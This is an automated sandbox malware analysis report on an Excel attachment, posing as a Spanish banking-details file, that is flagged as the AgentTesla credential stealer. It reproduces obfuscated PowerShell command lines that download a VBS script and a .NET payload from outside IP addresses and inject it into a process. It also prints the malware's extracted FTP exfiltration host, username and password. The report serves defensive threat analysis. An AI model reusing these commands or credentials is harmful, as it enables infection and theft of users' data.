Edit tour
Windows
Analysis Report
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
Overview
General Information
| Sample name: | Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx |
| Analysis ID: | 1467088 |
| MD5: | b3b485912e2457ca61dc4481e204385a |
| SHA1: | 823436e03fcfc203877217d95fbb6ca3bfb78b31 |
| SHA256: | 896a8259f8f9e5591c8f6bc3346c0b123a6b50efde85fbe8e913d1ec5af9f3a7 |
| Tags: | xlaxlsx |
| Infos: |   |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected Powershell download and execute
Yara detected obfuscated html page
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 1704 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 1100 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
cmd.exe (PID: 540 cmdline: "C:\Window s\system32 \cmd.exe" "/C poWers HEll - ex bYP AsS -n Op -W 1 -C deV IcEcrEDENt iAlDePlOyM enT.ExE ; Ie x($(IEX('[ SYsTEm.tEx t.EncODIng ]'+[chAr]5 8+[CHaR]0X 3a+'uTf8.G etSTRInG([ SySteM.CON VErT]'+[Ch aR]58+[Cha r]58+'fRom BaSe64StrI Ng('+[CHAr ]0X22+'JHl sc0ozTHU3N yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgP SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ URELXRZUGU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 NRW1CRXJkR WZpTml0SW9 OICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA nW0RsbEltc G9ydCgiVXJ sTU9OLkRsb CIsICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBDaGFyU2V 0ID0gQ2hhc lNldC5Vbml jb2RlKV1wd WJsaWMgc3R hdGljIGV4d GVybiBJbnR QdHIgVVJMR G93bmxvYWR Ub0ZpbGUoS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBwaW1 GQ1NhWCxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEYsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBjSFhoV EtzcnBILHV pbnQgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFlLUSxJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEdGKTs nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tTkFtZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgInZTc ElNclJ2SXp VIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW5hbUVTc EFDZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgU3puVSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLVB hc3NUaHJ1O yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgJ Hlsc0ozTHU 3Nzo6VVJMR G93bmxvYWR Ub0ZpbGUoM CwiaHR0cDo vLzE5OC40N i4xNzguMTQ 0L2V2ZW5pb mdmaWxlZGF 0aW5nbG92Z XIudmJzIiw iJEVOdjpBU FBEQVRBXGV 2ZW5pbmdma WxlZGF0aW5 nbG92ZXIud kJTIiwwLDA pO3N0QXJUL XNMZUVQKDM pO3N0YVJ0I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAiJ EVudjpBUFB EQVRBXGV2Z W5pbmdmaWx lZGF0aW5nb G92ZXIudkJ TIg=='+[ch AR]34+'))' )))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) 
powershell.exe (PID: 2988 cmdline: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEc rEDENtiAlD ePlOyMenT. ExE ; Iex($( IEX('[SYsT Em.tExt.En cODIng]'+[ chAr]58+[C HaR]0X3a+' uTf8.GetST RInG([SySt eM.CONVErT ]'+[ChaR]5 8+[Char]58 +'fRomBaSe 64StrINg(' +[CHAr]0X2 2+'JHlsc0o zTHU3NyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgPSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQUREL XRZUGUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1NRW1 CRXJkRWZpT ml0SW9OICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVXJsTU9 OLkRsbCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBDa GFyU2V0ID0 gQ2hhclNld C5Vbmljb2R lKV1wdWJsa WMgc3RhdGl jIGV4dGVyb iBJbnRQdHI gVVJMRG93b mxvYWRUb0Z pbGUoSW50U HRyICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBwaW1GQ1N hWCxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EYsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB jSFhoVEtzc nBILHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIFl LUSxJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EdGKTsnICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtTkF tZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gInZTcElNc lJ2SXpVIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 hbUVTcEFDZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgU 3puVSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJHlsc 0ozTHU3Nzo 6VVJMRG93b mxvYWRUb0Z pbGUoMCwia HR0cDovLzE 5OC40Ni4xN zguMTQ0L2V 2ZW5pbmdma WxlZGF0aW5 nbG92ZXIud mJzIiwiJEV OdjpBUFBEQ VRBXGV2ZW5 pbmdmaWxlZ GF0aW5nbG9 2ZXIudkJTI iwwLDApO3N 0QXJULXNMZ UVQKDMpO3N 0YVJ0ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiJEVud jpBUFBEQVR BXGV2ZW5pb mdmaWxlZGF 0aW5nbG92Z XIudkJTIg= ='+[chAR]3 4+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3160 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\cboglg ly\cboglgl y.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3172 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESC2C3.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\cbo glgly\CSC6 6221087E62 54F6E92E0F 9138CFEC2C 1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
wscript.exe (PID: 3264 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\eveni ngfiledati nglover.vB S" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3324 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " (('Y0ulink = xR'+'mh ttp://91.9 2.254.194/ imge/new-i mage_v.jpg '+'xRm; Y0 uwebC'+'li ent = New- Object Sys tem.Net.We bClient; t ry { Y0udo wnlo'+'ade dData '+'= Y0uwebCli ent.Downlo adD'+'ata( Y0ulink) } catch { W rite-'+'Ho st xRmFail ed To down load data from Y0uli nkxRm -For egroundC'+ 'olor Red; exit }; i f (Y0udown loadedData -ne Y0unu ll) { Y0ui ma'+'geTex t = [Syste m.T'+'ext' +'.Encodin g'+']::UTF 8.'+'GetSt ring(Y0udo wnloadedDa ta); Y0ust artFlag = xRm<<B'+'A SE64_START >>xRm; Y0u endFlag = xRm<<BASE6 4_EN'+'D>> xRm; Y0ust artIndex = Y0uimageT ext.IndexO f(Y0ustart Flag); Y0u endIn'+'de x = Y0uima geText.Ind exOf(Y0uen dFlag); if (Y0ustart Index -ge '+'0'+' -a nd Y0uendI nd'+'ex -g t Y0'+'ust artInde'+' x) { Y0ust artIndex + = Y0ustart Flag.Lengt h; Y0ubase 64Lengt'+' h = Y0uend Index - Y0 ustartInde x; Y0ubase '+'64Comma nd = Y0uim ageText.Su '+'bstring (Y0ustartI ndex, Y0ub ase64Lengt h); Y0ucom mandBytes = [System. Convert]:: FromBase64 String(Y0u base64Comm and); Y0ul oadedAssem bly = [Sys tem.Reflec '+'tion.As sem'+'bly] ::L'+'oad( Y0ucommand Bytes); Y0 utype = Y0 uloadedAss embly.GetT ype(xRm'+' RunPE.Hom' +'exRm); Y 0umethod = Y0utype'+ '.GetMetho d(xRmV'+'A Ix'+'Rm).I nvoke(Y0un ull, [obje ct[]] (xRm txt.44'+'4 6sabbbbbbb ewmadam/44 1.871.64.8 91//:ptthx Rm , xRmde sativadoxR m , xRmdes ativadoxRm , xRm'+'d esativadox '+'Rm,xRmA ddInProces s32xRm,xRm xRm)) } }' ) -rePlacE 'xRm',[Ch AR]39 -reP lacE ([ChA R]89+[ChAR ]48+[ChAR] 117),[ChAR ]36)|IEX" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - AddInProcess32.exe (PID: 3440 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| Click to see the 6 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
| MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
| |
| Click to see the 9 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||